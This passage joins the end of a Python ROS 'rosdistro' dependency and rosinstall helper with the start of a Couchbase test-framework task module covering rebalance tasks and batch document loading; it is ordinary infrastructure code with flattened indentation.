return self.get_packages()[pkg]
def get_rosinstall(self, items, version='last_release', source='vcs'):
rosinstall = ""
for p in self._convert_to_pkg_list(items):
rosinstall += p.get_rosinstall(version, source, self.distro_file.name)
return rosinstall
def _get_depends_on1(self, package_name):
if package_name in self.depends_on1_cache:
return self.depends_on1_cache[package_name]
res = copy.deepcopy(RES_DICT)
for pkg in self.get_packages():
for key, depends in self._get_depends1(pkg).iteritems():
if package_name in depends:
res[key].append(pkg)
self.depends_on1_cache[package_name] = res
return res
def get_depends_on1(self, items):
return self.get_depends_on(items, 1)
def get_depends_on(self, items, depth=0, dep_dict=walks['FULL_WALK']):
res = copy.deepcopy(RES_DICT)
for p in self._convert_to_pkg_list(items):
for dep_type, dep_list in res.iteritems():
self._get_depends_on_recursive(p.name, dep_type, invert_dict(dep_dict), dep_list, depth, 1)
return res
def _get_depends_on_recursive(self, package_name, dep_type, dep_dict, res, depth, curr_depth):
deps_on = self._get_depends_on1(package_name)
# merge and recurse
for d in deps_on[dep_type]:
if d not in res:
res.append(d)
if depth == 0 or curr_depth < depth:
for next_dep_type in dep_dict[dep_type]:
self._get_depends_on_recursive(d, next_dep_type, dep_dict, res, depth, curr_depth + 1)
def _get_depends1(self, package_name):
p = self.distro_file.packages[package_name]
return self.depends_file.get_dependencies(p, self.distro_file.name)
def get_depends1(self, items):
return self.get_depends(items, 1)
def get_depends(self, items, depth=0, dep_dict=walks['FULL_WALK']):
res = copy.deepcopy(RES_DICT)
for p in self._convert_to_pkg_list(items):
for dep_type, dep_list in res.iteritems():
self._get_depends_recursive(p.name, dep_type, dep_dict, dep_list, depth, 1)
return res
def _get_depends_recursive(self, package_name, dep_type, dep_dict, res, depth, curr_depth):
deps1 = self._get_depends1(package_name)
# merge and recurse
for d in deps1[dep_type]:
if d not in res:
res.append(d)
if depth == 0 or curr_depth < depth:
if d in self.get_packages(): # recurse on packages only
for next_dep_type in dep_dict[dep_type]:
self._get_depends_recursive(d, next_dep_type, dep_dict, res, depth, curr_depth + 1)
def _convert_to_pkg_list(self, items):
if type(items) != list:
items = [items]
pkgs = []
for i in items:
if i in self.distro_file.repositories:
for p in self.distro_file.repositories[i].packages:
if p not in pkgs:
pkgs.append(p)
elif i in self.distro_file.packages:
if not self.distro_file.packages[i] in pkgs:
pkgs.append(self.distro_file.packages[i])
else:
raise RuntimeError("!!! {0} is not a package name nor a repository name".format(i))
return pkgs
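# Illustrative usage sketch (the distro and package names are just examples):
#
#     distro = RosDistro('groovy')
#     deps = distro.get_depends('roscpp', depth=1)
#     print(deps['build'])
#     print(distro.get_rosinstall('roscpp', version='last_release', source='tar'))
#
# get_depends/get_depends_on accept a package or repository name (or a list of them) and
# return a dict keyed by dependency type ('build', 'buildtool', 'test', 'run').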
class RosDistroFile:
def __init__(self, name):
self.packages = {}
self.repositories = {}
self.name = name
# parse ros distro file
distro_url = urlopen('https://raw.github.com/ros/rosdistro/master/releases/%s.yaml' % name)
distro = yaml.load(distro_url.read())['repositories']
# loop over all repo's
for repo_name, data in distro.iteritems():
repo = RosRepository(repo_name, data['version'], data['url'])
self.repositories[repo_name] = repo
            if 'packages' not in data:  # support unary distros
data['packages'] = {repo_name: ''}
# loop over all packages
for pkg_name in data['packages'].keys():
pkg = RosPackage(pkg_name, repo)
repo.packages.append(pkg)
self.packages[pkg_name] = pkg
class RosRepository:
def __init__(self, name, version, url):
self.name = name
self.version = version
self.url = url
self.packages = []
def get_rosinstall(self, version, source):
return "\n".join([p.get_rosinstall(version, source) for p in self.packages])
class RosPackage:
def __init__(self, name, repository):
self.name = name
self.repository = repository
self._package_xmls = {}
self._release_tags = {}
def _fetch_package_xml(self, rosdistro):
repo = self.repository
if 'github.com' in repo.url:
url = repo.url
release_tag = 'release/{0}/{1}/{2}'.format(rosdistro, self.name, repo.version)
url = url.replace('.git', '/{0}/package.xml'.format(release_tag))
url = url.replace('git://', 'https://')
url = url.replace('https://', 'https://raw.')
try:
try:
package_xml = urlopen(url).read()
except Exception as e:
msg = "Failed to read package.xml file from url '{0}': {1}".format(url, e)
warning(msg)
upstream_version = repo.version.split('-')[0]
legacy_release_tag = 'release/{0}/{1}'.format(self.name, upstream_version)
url = url.replace(release_tag, legacy_release_tag)
info("Trying to read from legacy-style url '{0}' instead".format(url))
package_xml = urlopen(url).read()
except Exception as e:
msg += '\nAND\n'
msg += "Failed to read package.xml file from url '{0}': {1}".format(url, e)
raise RuntimeError(msg)
self._package_xmls[rosdistro] = package_xml
self._release_tags[rosdistro] = release_tag
return package_xml, release_tag
else:
raise Exception("Non-github repositories are net yet supported by the rosdistro tool")
def get_package_xml(self, rosdistro):
if rosdistro not in self._package_xmls:
self._fetch_package_xml(rosdistro)
return self._package_xmls[rosdistro]
def get_release_tag(self, rosdistro):
if rosdistro not in self._release_tags:
self._fetch_package_xml(rosdistro)
return self._release_tags[rosdistro]
def get_rosinstall(self, version, source, rosdistro):
# can't get last release of unreleased repository
if version == 'last_release' and not self.repository.version:
raise RuntimeError("Can't get the last release of unreleased repository {0}".format(self.repository.name))
        # set specific version of last release if needed
if version == 'last_release':
version = self.repository.version.split('-')[0]
# generate the rosinstall file
release_tag = self.get_release_tag(rosdistro)
if version == 'master':
return yaml.dump([{
'git': {
'local-name': self.name,
'uri': self.repository.url,
'version': '/'.join(release_tag.split('/')[:-1])
}}],
default_style=False)
else:
if source == 'vcs':
return yaml.safe_dump([{
'git': {
'local-name': self.name,
'uri': self.repository.url,
'version': release_tag
}}],
default_style=False)
elif source == 'tar':
uri = self.repository.url
uri = uri.replace('git://', 'https://')
uri = uri.replace('.git', '/archive/{0}.tar.gz'.format(release_tag))
return yaml.safe_dump([{
'tar': {
'local-name': self.name,
'uri': uri,
'version': '{0}-release-{1}'.format(self.repository.name, release_tag.replace('/', '-'))
}}],
default_style=False)
else:
raise RuntimeError("Invalid source type {0}".format(source))
class RosDependencies:
def __init__(self, name, cache_location):
# url's
self.file_name = '%s-dependencies.yaml' % name
if cache_location:
self.local_url = os.path.join(cache_location, self.file_name)
else:
from rospkg import environment
self.local_url = os.path.join(environment.get_ros_home(), self.file_name)
self.server_url = 'http://www.ros.org/rosdistro/%s-dependencies.tar.gz' % name
self.dependencies = {}
# initialize with the local or server cache
deps = self._read_local_cache()
if deps == {}:
deps = self._read_server_cache()
for key, value in deps.iteritems():
self.dependencies[key] = value
if self.cache == 'server':
self._write_local_cache()
def get_dependencies(self, package, rosdistro):
repo = package.repository
# support unreleased stacks
if not repo.version:
return copy.deepcopy(RES_DICT)
key = '%s?%s?%s' % (repo.name, repo.version, package.name)
# check in memory first
if key in self.dependencies:
return self.dependencies[key]
# read server cache if needed
if self.cache != 'server':
deps = self._read_server_cache()
for key, value in deps.iteritems():
self.dependencies[key] = value
self._write_local_cache()
if key in self.dependencies:
return self.dependencies[key]
# retrieve dependencies
deps = retrieve_dependencies(package.get_package_xml(rosdistro))
self.dependencies[key] = deps
self._write_local_cache()
return deps
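    # Lookup order used above: the in-memory dict (keyed as
    # "<repo>?<version>?<package>", e.g. "foo?1.0.0-0?foo_msgs" for a
    # hypothetical package), then the downloaded server cache, and finally a
    # fresh parse of the package.xml fetched from GitHub; newly resolved keys
    # are written back to the local cache file.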
def _read_server_cache(self):
self.cache = 'server'
try:
resp = urlopen(self.server_url)
except HTTPError as ex:
warning("Failed to read server cache: %s" % ex)
return {}
with tempfile.NamedTemporaryFile('w') as fh:
fh.write(resp.read())
fh.flush()
tar = tarfile.open(fh.name, 'r')
data = tar.extractfile(self.file_name)
            deps = yaml.safe_load(data.read())
            if not deps \
                    or 'cache_version' not in deps \
                    or deps['cache_version'] != CACHE_VERSION \
                    or 'repositories' not in deps:
                raise RuntimeError("Invalid server dependency cache downloaded from %s" % self.server_url)
return deps['repositories']
def _read_local_cache(self):
try:
self.cache = 'local'
with open(self.local_url) as f:
deps = yaml.safe_load(f.read())
if not deps \
or 'cache_version' not in deps \
or deps['cache_version'] != CACHE_VERSION \
or 'repositories' not in deps:
                    raise RuntimeError("Invalid local dependency cache at %s" % self.local_url)
return deps['repositories']
except Exception:
return {}
def _write_local_cache(self):
try:
try:
os.makedirs(os.path.dirname(self.local_url))
except:
pass
with open(self.local_url, 'w') as f:
yaml.dump({'cache_version': CACHE_VERSION,
'repositories': self.dependencies},
f)
except Exception as ex:
error("Failed to write local dependency cache to %s: %s" % (self.local_url, ex))
def retrieve_dependencies(package_xml):
try:
return get_package_dependencies(package_xml)
except Exception:
raise RuntimeError("Failed to get dependencies from package_xml:\n```\n{0}\n```".format(package_xml))
def get_package_dependencies(package_xml):
if not os.path.abspath("/usr/lib/pymodules/python2.7") in sys.path:
sys.path.append("/usr/lib/pymodules/python2.7")
from catkin_pkg import package as catkin_pkg
pkg = catkin_pkg.parse_package_string(package_xml)
depends1 = {'build': [d.name for d in pkg.build_depends],
'buildtool': [d.name for d in pkg.buildtool_depends],
'test': [d.name for d in pkg.test_depends],
'run': [d.name for d in pkg.run_depends]}
return depends1
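# Illustrative return value of get_package_dependencies() (the actual names
# depend on the manifest being parsed):
#
#   {'build': ['roscpp', 'std_msgs'],
#    'buildtool': ['catkin'],
#    'test': ['rosunit'],
#    'run': ['roscpp', 'std_msgs']}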
|
task.py
|
"""
Created on Sep 14, 2017
@author: riteshagarwal
"""
import copy
import json
import json as Json
import os
import random
import socket
import threading
import time
from copy import deepcopy
import zlib
from httplib import IncompleteRead
import com.couchbase.test.transactions.SimpleTransaction as Transaction
from _threading import Lock
from com.couchbase.client.java.json import JsonObject
from java.lang import Thread
from java.util.concurrent import Callable
from reactor.util.function import Tuples
from BucketLib.BucketOperations import BucketHelper
from BucketLib.MemcachedOperations import MemcachedHelper
from BucketLib.bucket import Bucket
from Cb_constants import constants, CbServer, DocLoading
from CbasLib.CBASOperations import CBASHelper
from CbasLib.cbas_entity import Dataverse, CBAS_Collection, Dataset, Synonym, \
CBAS_Index, CBAS_UDF
from Jython_tasks.task_manager import TaskManager
from cb_tools.cbstats import Cbstats
from collections_helper.collections_spec_constants import MetaConstants
from common_lib import sleep
from couchbase_helper.document import DesignDocument
from couchbase_helper.documentgenerator import BatchedDocumentGenerator, \
SubdocDocumentGenerator
from global_vars import logger
from custom_exceptions.exception import \
N1QLQueryException, DropIndexException, CreateIndexException, \
DesignDocCreationException, QueryViewException, ReadDocumentException, \
RebalanceFailedException, ServerUnavailableException, \
BucketCreationException, AutoFailoverException, GetBucketInfoFailed, \
CompactViewFailed, SetViewInfoNotFound, FailoverFailedException, \
BucketFlushFailed
from membase.api.rest_client import RestConnection
from remote.remote_util import RemoteUtilHelper, RemoteMachineShellConnection
from sdk_exceptions import SDKException
from table_view import TableView, plot_graph
from testconstants import INDEX_QUOTA, FTS_QUOTA, CBAS_QUOTA, MIN_KV_QUOTA
from gsiLib.GsiHelper_Rest import GsiHelper
class Task(Callable):
def __init__(self, thread_name):
self.thread_name = thread_name
self.exception = None
self.completed = False
self.started = False
self.start_time = None
self.end_time = None
self.log = logger.get("infra")
self.test_log = logger.get("test")
self.result = False
self.sleep = time.sleep
def __str__(self):
if self.exception:
raise self.exception
elif self.completed:
self.log.info("Task %s completed on: %s"
% (self.thread_name,
str(time.strftime("%H:%M:%S",
time.gmtime(self.end_time)))))
return "%s task completed in %.2fs" % \
                   (self.thread_name, self.end_time - self.start_time)
elif self.started:
return "Thread %s at %s" % \
(self.thread_name,
str(time.strftime("%H:%M:%S",
time.gmtime(self.start_time))))
else:
return "[%s] not yet scheduled" % self.thread_name
def start_task(self):
self.started = True
self.start_time = time.time()
self.log.info("Thread '%s' started" % self.thread_name)
def set_exception(self, exception):
self.exception = exception
self.complete_task()
raise BaseException(self.exception)
def set_warn(self, exception):
self.exception = exception
self.complete_task()
self.log.warn("Warning from '%s': %s" % (self.thread_name, exception))
def complete_task(self):
self.completed = True
self.end_time = time.time()
self.log.info("Thread '%s' completed" % self.thread_name)
def set_result(self, result):
self.result = result
def call(self):
raise NotImplementedError
@staticmethod
def wait_until(value_getter, condition, timeout_secs=300):
"""
Repeatedly calls value_getter returning the value when it
satisfies condition. Calls to value getter back off exponentially.
Useful if you simply want to synchronously wait for a condition to be
satisfied.
:param value_getter: no-arg function that gets a value
:param condition: single-arg function that tests the value
:param timeout_secs: number of seconds after which to timeout
default=300 seconds (5 mins.)
:return: the value returned by value_getter
:raises: Exception if the operation times out before
getting a value that satisfies condition
"""
start_time = time.time()
stop_time = start_time + timeout_secs
interval = 0.01
attempt = 0
value = value_getter()
logger.get("infra").debug(
"Wait for expected condition to get satisfied")
while not condition(value):
now = time.time()
if timeout_secs < 0 or now < stop_time:
sleep(2 ** attempt * interval)
attempt += 1
value = value_getter()
else:
raise Exception('Timeout after {0} seconds and {1} attempts'
.format(now - start_time, attempt))
return value
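    # Minimal usage sketch for wait_until (rest/bucket/expected_items below
    # are hypothetical):
    #
    #   item_count = Task.wait_until(
    #       lambda: rest.get_item_count(bucket),    # value_getter
    #       lambda count: count >= expected_items,  # condition
    #       timeout_secs=120)
    #
    # Polling starts at a 10 ms interval and doubles after every attempt until
    # the condition holds or timeout_secs elapses.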
class FunctionCallTask(Task):
""" A task that calls a given function `f` with arguments `args` and key-word arguments `kwds` """
def __init__(self, f, args=(), kwds={}):
""" The constructor.
Args:
f (function): The function to call.
args (tuple): A tuple of arguments for the function `f`.
kwds (dict): A dictionary of keyword arguments for the function `f`.
"""
super(FunctionCallTask, self).__init__("FunctionCallTask: function:{} Args:{} Kwds:{}".format(f, args, kwds))
self.f, self.args, self.kwds = f, args, kwds
def call(self):
""" Calls the function f """
self.start_task()
result = self.f(*self.args, **self.kwds)
self.complete_task()
return result
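    # Typical usage sketch ('task_manager' and 'do_cleanup' are hypothetical):
    #
    #   task = FunctionCallTask(do_cleanup, args=(bucket,), kwds={'force': True})
    #   task_manager.add_new_task(task)
    #   result = task_manager.get_task_result(task)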
class RebalanceTask(Task):
def __init__(self, servers, to_add=[], to_remove=[], do_stop=False,
progress=30, use_hostnames=False, services=None,
check_vbucket_shuffling=True, sleep_before_rebalance=0,
retry_get_process_num=25):
super(RebalanceTask, self).__init__(
"Rebalance_task_IN=[{}]_OUT=[{}]_{}"
.format(",".join([node.ip for node in to_add]),
",".join([node.ip for node in to_remove]),
str(time.time())))
self.servers = servers
self.to_add = to_add
self.to_remove = to_remove
self.start_time = None
self.services = services
self.monitor_vbuckets_shuffling = False
self.check_vbucket_shuffling = check_vbucket_shuffling
self.result = False
self.retry_get_process_num = retry_get_process_num
try:
self.rest = RestConnection(self.servers[0])
except ServerUnavailableException, e:
self.test_log.error(e)
raise e
self.retry_get_progress = 0
self.use_hostnames = use_hostnames
self.previous_progress = 0
self.old_vbuckets = {}
self.thread_used = "Rebalance_task"
cluster_stats = self.rest.get_cluster_stats()
self.table = TableView(self.test_log.info)
self.table.set_headers(["Nodes", "Services", "Version",
"CPU", "Status"])
node_ips_to_remove = [node.ip for node in to_remove]
for node, stat in cluster_stats.items():
node_ip = node.split(':')[0]
node_status = "Cluster node"
if node_ip in node_ips_to_remove:
node_status = "--- OUT --->"
self.table.add_row([node_ip, ", ".join(stat["services"]),
stat["version"], stat["cpu_utilization"],
node_status])
    def __str__(self):
        if self.exception:
            return "[%s] rebalance failed with error: %s" % \
                   (self.thread_name, self.exception)
        elif self.completed:
            self.test_log.debug("Time: %s"
                                % str(time.strftime("%H:%M:%S",
                                                    time.gmtime(time.time()))))
            return "[%s] rebalance completed in %.2fs" % \
                   (self.thread_name, self.end_time - self.start_time)
        elif self.started:
            return "[%s] rebalance started at %s" % \
                   (self.thread_name,
                    str(time.strftime("%H:%M:%S",
                                      time.gmtime(self.start_time))))
        else:
            return "[%s] not yet scheduled" % self.thread_name
def call(self):
self.start_task()
try:
if len(self.to_add) and len(self.to_add) == len(self.to_remove):
node_version_check = self.rest.check_node_versions()
non_swap_servers = set(self.servers) - set(
self.to_remove) - set(self.to_add)
if self.check_vbucket_shuffling:
self.old_vbuckets = BucketHelper(
self.servers[0])._get_vbuckets(non_swap_servers, None)
if self.old_vbuckets and self.check_vbucket_shuffling:
self.monitor_vbuckets_shuffling = True
if self.monitor_vbuckets_shuffling \
and node_version_check and self.services:
for service_group in self.services:
if "kv" not in service_group:
self.monitor_vbuckets_shuffling = False
if self.monitor_vbuckets_shuffling and node_version_check:
services_map = self.rest.get_nodes_services()
for remove_node in self.to_remove:
key = "{0}:{1}".format(remove_node.ip,
remove_node.port)
services = services_map[key]
if "kv" not in services:
self.monitor_vbuckets_shuffling = False
if self.monitor_vbuckets_shuffling:
self.test_log.debug("Will monitor vbucket shuffling for "
"swap rebalance")
self.add_nodes()
self.start_rebalance()
self.table.display("Rebalance Overview")
self.check()
# self.task_manager.schedule(self)
except Exception as e:
self.exception = e
self.result = False
self.test_log.error(str(e))
return self.result
self.complete_task()
self.result = True
return self.result
def add_nodes(self):
master = self.servers[0]
services_for_node = None
node_index = 0
for node in self.to_add:
if self.services is not None:
services_for_node = [self.services[node_index]]
node_index += 1
self.table.add_row([node.ip, services_for_node, "", "",
"<--- IN ---"])
if self.use_hostnames:
self.rest.add_node(master.rest_username, master.rest_password,
node.hostname, node.port,
services=services_for_node)
else:
self.rest.add_node(master.rest_username, master.rest_password,
node.ip, node.port,
services=services_for_node)
def start_rebalance(self):
nodes = self.rest.node_statuses()
# Determine whether its a cluster_run/not
cluster_run = True
firstIp = self.servers[0].ip
if len(self.servers) == 1 and self.servers[0].port == '8091':
cluster_run = False
else:
for node in self.servers:
if node.ip != firstIp:
cluster_run = False
break
remove_node_msg = "Removing node {0}:{1} from cluster"
ejectedNodes = list()
for server in self.to_remove:
for node in nodes:
if cluster_run:
if int(server.port) == int(node.port):
ejectedNodes.append(node.id)
self.test_log.debug(remove_node_msg.format(node.ip,
node.port))
else:
if self.use_hostnames:
if server.hostname == node.ip \
and int(server.port) == int(node.port):
ejectedNodes.append(node.id)
self.test_log.debug(remove_node_msg
.format(node.ip, node.port))
elif server.ip == node.ip \
and int(server.port) == int(node.port):
ejectedNodes.append(node.id)
self.test_log.debug(remove_node_msg.format(node.ip,
node.port))
self.rest.rebalance(otpNodes=[node.id for node in nodes],
ejectedNodes=ejectedNodes)
self.start_time = time.time()
def check(self):
self.poll = True
while self.poll:
self.poll = False
try:
if self.monitor_vbuckets_shuffling:
non_swap_servers = set(self.servers) - set(
self.to_remove) - set(self.to_add)
new_vbuckets = BucketHelper(self.servers[0])._get_vbuckets(
non_swap_servers, None)
for vb_type in ["active_vb", "replica_vb"]:
for srv in non_swap_servers:
if set(self.old_vbuckets[srv][vb_type]) != set(
new_vbuckets[srv][vb_type]):
msg = "%s vBuckets were shuffled on %s! " \
"Expected: %s, Got: %s" \
% (vb_type, srv.ip,
self.old_vbuckets[srv][vb_type],
new_vbuckets[srv][vb_type])
self.test_log.error(msg)
raise Exception(msg)
(status, progress) = self.rest._rebalance_status_and_progress()
self.test_log.info("Rebalance - status: %s, progress: %s",
status,
progress)
# if ServerUnavailableException
if progress == -100:
self.retry_get_progress += 1
if self.previous_progress != progress:
self.previous_progress = progress
self.retry_get_progress = 0
else:
self.retry_get_progress += 1
except RebalanceFailedException as ex:
self.result = False
raise ex
# catch and set all unexpected exceptions
except Exception as e:
self.result = False
raise e
if self.rest.is_cluster_mixed():
""" for mix cluster, rebalance takes longer """
self.test_log.debug("Rebalance in mix cluster")
self.retry_get_process_num = 40
# we need to wait for status to be 'none'
# (i.e. rebalance actually finished and not just 'running' and at 100%)
# before we declare ourselves done
if progress != -1 and status != 'none':
if self.retry_get_progress < self.retry_get_process_num:
self.log.debug("Wait before next rebalance progress check")
sleep(5, log_type="infra")
self.poll = True
else:
self.result = False
self.rest.print_UI_logs()
raise RebalanceFailedException(
"seems like rebalance hangs. please check logs!")
else:
success_cleaned = []
for removed in self.to_remove:
try:
rest = RestConnection(removed)
except ServerUnavailableException, e:
self.test_log.error(e)
continue
start = time.time()
while time.time() - start < 30:
try:
if 'pools' in rest.get_pools_info() and \
(len(rest.get_pools_info()["pools"]) == 0):
success_cleaned.append(removed)
break
except (ServerUnavailableException, IncompleteRead), e:
self.test_log.error(e)
for node in set(self.to_remove) - set(success_cleaned):
self.test_log.error(
"Node {0}:{1} was not cleaned after removing from cluster"
.format(node.ip, node.port))
self.result = False
self.test_log.info(
"Rebalance completed with progress: {0}% in {1} sec"
.format(progress, time.time() - self.start_time))
self.result = True
return
class GenericLoadingTask(Task):
def __init__(self, cluster, bucket, client, batch_size=1,
timeout_secs=5, time_unit="seconds", compression=None,
retries=5,
suppress_error_table=False, sdk_client_pool=None,
scope=CbServer.default_scope,
collection=CbServer.default_collection,
preserve_expiry=None, sdk_retry_strategy=None):
super(GenericLoadingTask, self).__init__("Loadgen_task_%s_%s_%s_%s"
% (bucket, scope, collection,
time.time()))
self.batch_size = batch_size
self.timeout = timeout_secs
self.time_unit = time_unit
self.cluster = cluster
self.bucket = bucket
self.scope = scope
self.collection = collection
self.client = client
self.sdk_client_pool = sdk_client_pool
self.random = random.Random()
self.compression = compression
self.retries = retries
self.suppress_error_table = suppress_error_table
self.docs_loaded = 0
self.preserve_expiry = preserve_expiry
self.sdk_retry_strategy = sdk_retry_strategy
def call(self):
self.start_task()
try:
while self.has_next():
self.next()
except Exception as e:
self.test_log.error(e)
self.set_exception(Exception(e.message))
return
self.complete_task()
def has_next(self):
raise NotImplementedError
def next(self):
raise NotImplementedError
# start of batch methods
def batch_create(self, key_val, client=None, persist_to=0,
replicate_to=0,
doc_type="json", durability="", skip_read_on_error=False):
"""
standalone method for creating key/values in batch (sans kvstore)
arguments:
key_val -- array of key/value dicts to load size = self.batch_size
client -- optional client to use for data loading
"""
success = dict()
fail = dict()
try:
client = client or self.client
success, fail = client.set_multi(
key_val, self.exp, exp_unit=self.exp_unit,
persist_to=persist_to, replicate_to=replicate_to,
timeout=self.timeout, time_unit=self.time_unit,
doc_type=doc_type, durability=durability,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail:
failed_item_table = None
if not self.suppress_error_table:
failed_item_table = TableView(self.test_log.info)
failed_item_table.set_headers(["Create Key",
"Exception"])
if not skip_read_on_error:
self.log.debug(
"Sleep before reading the doc for verification")
Thread.sleep(self.timeout)
# self.test_log.debug("Reading values {0} after failure"
# .format(fail.keys()))
read_map, _ = self.batch_read(fail.keys())
for key, value in fail.items():
if key in read_map and read_map[key]["cas"] != 0:
success[key] = value
success[key].pop("error")
fail.pop(key)
elif not self.suppress_error_table:
failed_item_table.add_row([key, value['error']])
elif not self.suppress_error_table:
for key, value in fail.items():
failed_item_table.add_row([key, value['error']])
if not self.suppress_error_table:
failed_item_table.display("Keys failed in %s:%s:%s"
% (self.client.bucket.name,
self.scope,
self.collection))
return success, copy.deepcopy(fail)
except Exception as error:
self.test_log.error(error)
return success, copy.deepcopy(fail)
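    # All batch_* helpers in this class return a (success, fail) pair of dicts
    # keyed by document key. Failed entries carry an 'error' field; when
    # skip_read_on_error is False, keys that turn out to be readable on
    # re-read (cas != 0) are moved back into 'success' before returning.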
def batch_update(self, key_val, client=None, persist_to=0,
replicate_to=0,
doc_type="json", durability="", skip_read_on_error=False):
success = dict()
fail = dict()
try:
client = client or self.client
success, fail = client.upsert_multi(
key_val, self.exp, exp_unit=self.exp_unit,
persist_to=persist_to, replicate_to=replicate_to,
timeout=self.timeout, time_unit=self.time_unit,
doc_type=doc_type, durability=durability,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail:
key_val = dict(key_val)
if not self.suppress_error_table:
failed_item_table = TableView(self.test_log.info)
failed_item_table.set_headers(["Update Key",
"Exception"])
if not skip_read_on_error:
self.log.debug(
"Sleep before reading the doc for verification")
Thread.sleep(self.timeout)
self.test_log.debug("Reading values {0} after failure"
.format(fail.keys()))
read_map, _ = self.batch_read(fail.keys())
for key, value in fail.items():
if key in read_map and read_map[key]["cas"] != 0 \
and value == read_map[key]["value"]:
success[key] = value
success[key].pop("error")
fail.pop(key)
elif not self.suppress_error_table:
failed_item_table.add_row([key, value['error']])
elif not self.suppress_error_table:
for key, value in fail.items():
failed_item_table.add_row([key, value['error']])
if not self.suppress_error_table:
failed_item_table.display("Keys failed in %s:%s:%s"
% (self.client.bucket.name,
self.scope,
self.collection))
return success, copy.deepcopy(fail)
except Exception as error:
self.test_log.error(error)
return success, copy.deepcopy(fail)
def batch_replace(self, key_val, client=None, persist_to=0,
replicate_to=0,
doc_type="json", durability="",
skip_read_on_error=False):
success = dict()
fail = dict()
try:
client = client or self.client
success, fail = client.replace_multi(
key_val, self.exp, exp_unit=self.exp_unit,
persist_to=persist_to, replicate_to=replicate_to,
timeout=self.timeout, time_unit=self.time_unit,
doc_type=doc_type, durability=durability,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail:
if not self.suppress_error_table:
failed_item_table = TableView(self.test_log.info)
failed_item_table.set_headers(["Replace Key",
"Exception"])
if not skip_read_on_error:
self.log.debug(
"Sleep before reading the doc for verification")
Thread.sleep(self.timeout)
self.test_log.debug("Reading values {0} after failure"
.format(fail.keys()))
read_map, _ = self.batch_read(fail.keys())
for key, value in fail.items():
if key in read_map and read_map[key]["cas"] != 0:
success[key] = value
success[key].pop("error")
fail.pop(key)
elif not self.suppress_error_table:
failed_item_table.add_row([key, value['error']])
elif not self.suppress_error_table:
for key, value in fail.items():
failed_item_table.add_row([key, value['error']])
if not self.suppress_error_table:
failed_item_table.display("Keys failed in %s:%s:%s"
% (self.client.bucket.name,
self.scope,
self.collection))
return success, copy.deepcopy(fail)
except Exception as error:
self.test_log.error(error)
return success, copy.deepcopy(fail)
def batch_delete(self, key_val, client=None, persist_to=None,
replicate_to=None,
durability=""):
client = client or self.client
success, fail = client.delete_multi(
dict(key_val).keys(),
persist_to=persist_to,
replicate_to=replicate_to,
timeout=self.timeout,
time_unit=self.time_unit,
durability=durability,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail and not self.suppress_error_table:
failed_item_view = TableView(self.test_log.info)
failed_item_view.set_headers(["Delete Key", "Exception"])
for key, exception in fail.items():
failed_item_view.add_row([key, exception])
failed_item_view.display("Keys failed in %s:%s:%s"
% (client.bucket.name,
self.scope,
self.collection))
return success, fail
def batch_touch(self, key_val, exp=0):
success, fail = self.client.touch_multi(
dict(key_val).keys(),
exp=exp,
timeout=self.timeout,
time_unit=self.time_unit,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail and not self.suppress_error_table:
failed_item_view = TableView(self.test_log.info)
failed_item_view.set_headers(["Touch Key", "Exception"])
for key, exception in fail.items():
failed_item_view.add_row([key, exception])
failed_item_view.display("Keys failed in %s:%s:%s"
% (self.client.bucket.name,
self.scope,
self.collection))
return success, fail
def batch_read(self, keys, client=None):
client = client or self.client
success, fail = client.get_multi(
keys, timeout=self.timeout,
time_unit=self.time_unit,
sdk_retry_strategy=self.sdk_retry_strategy)
if fail and not self.suppress_error_table:
failed_item_view = TableView(self.test_log.info)
failed_item_view.set_headers(["Read Key", "Exception"])
for key, exception in fail.items():
failed_item_view.add_row([key, exception])
failed_item_view.display("Keys failed in %s:%s:%s"
% (client.bucket.name,
self.scope,
self.collection))
return success, fail
def batch_sub_doc_insert(self, key_value,
persist_to=0, replicate_to=0,
durability="",
create_path=True, xattr=False):
success = dict()
fail = dict()
try:
success, fail = self.client.sub_doc_insert_multi(
key_value,
exp=self.exp,
exp_unit=self.exp_unit,
persist_to=persist_to,
replicate_to=replicate_to,
timeout=self.timeout,
time_unit=self.time_unit,
durability=durability,
create_path=create_path,
xattr=xattr,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
except Exception as error:
self.log.error(error)
self.set_exception("Exception during sub_doc insert: {0}"
.format(error))
return success, fail
def batch_sub_doc_upsert(self, key_value,
persist_to=0, replicate_to=0,
durability="",
create_path=True, xattr=False):
success = dict()
fail = dict()
try:
success, fail = self.client.sub_doc_upsert_multi(
key_value,
exp=self.exp,
exp_unit=self.exp_unit,
persist_to=persist_to,
replicate_to=replicate_to,
timeout=self.timeout,
time_unit=self.time_unit,
durability=durability,
create_path=create_path,
xattr=xattr,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
except Exception as error:
self.log.error(error)
self.set_exception("Exception during sub_doc upsert: {0}"
.format(error))
return success, fail
def batch_sub_doc_replace(self, key_value,
persist_to=0, replicate_to=0,
durability="", xattr=False):
success = dict()
fail = dict()
try:
success, fail = self.client.sub_doc_replace_multi(
key_value,
exp=self.exp,
exp_unit=self.exp_unit,
persist_to=persist_to,
replicate_to=replicate_to,
timeout=self.timeout,
time_unit=self.time_unit,
durability=durability,
xattr=xattr,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
except Exception as error:
self.log.error(error)
self.set_exception("Exception during sub_doc upsert: {0}"
.format(error))
return success, fail
def batch_sub_doc_remove(self, key_value,
persist_to=0, replicate_to=0,
durability="", xattr=False):
success = dict()
fail = dict()
try:
success, fail = self.client.sub_doc_remove_multi(
key_value,
exp=self.exp,
exp_unit=self.exp_unit,
persist_to=persist_to,
replicate_to=replicate_to,
timeout=self.timeout,
time_unit=self.time_unit,
durability=durability,
xattr=xattr,
preserve_expiry=self.preserve_expiry,
sdk_retry_strategy=self.sdk_retry_strategy)
except Exception as error:
self.log.error(error)
self.set_exception("Exception during sub_doc remove: {0}"
.format(error))
return success, fail
def batch_sub_doc_read(self, key_value, xattr=False):
success = dict()
fail = dict()
try:
success, fail = self.client.sub_doc_read_multi(
key_value,
timeout=self.timeout,
time_unit=self.time_unit,
xattr=xattr)
except Exception as error:
self.log.error(error)
self.set_exception("Exception during sub_doc read: {0}"
.format(error))
return success, fail
class LoadDocumentsTask(GenericLoadingTask):
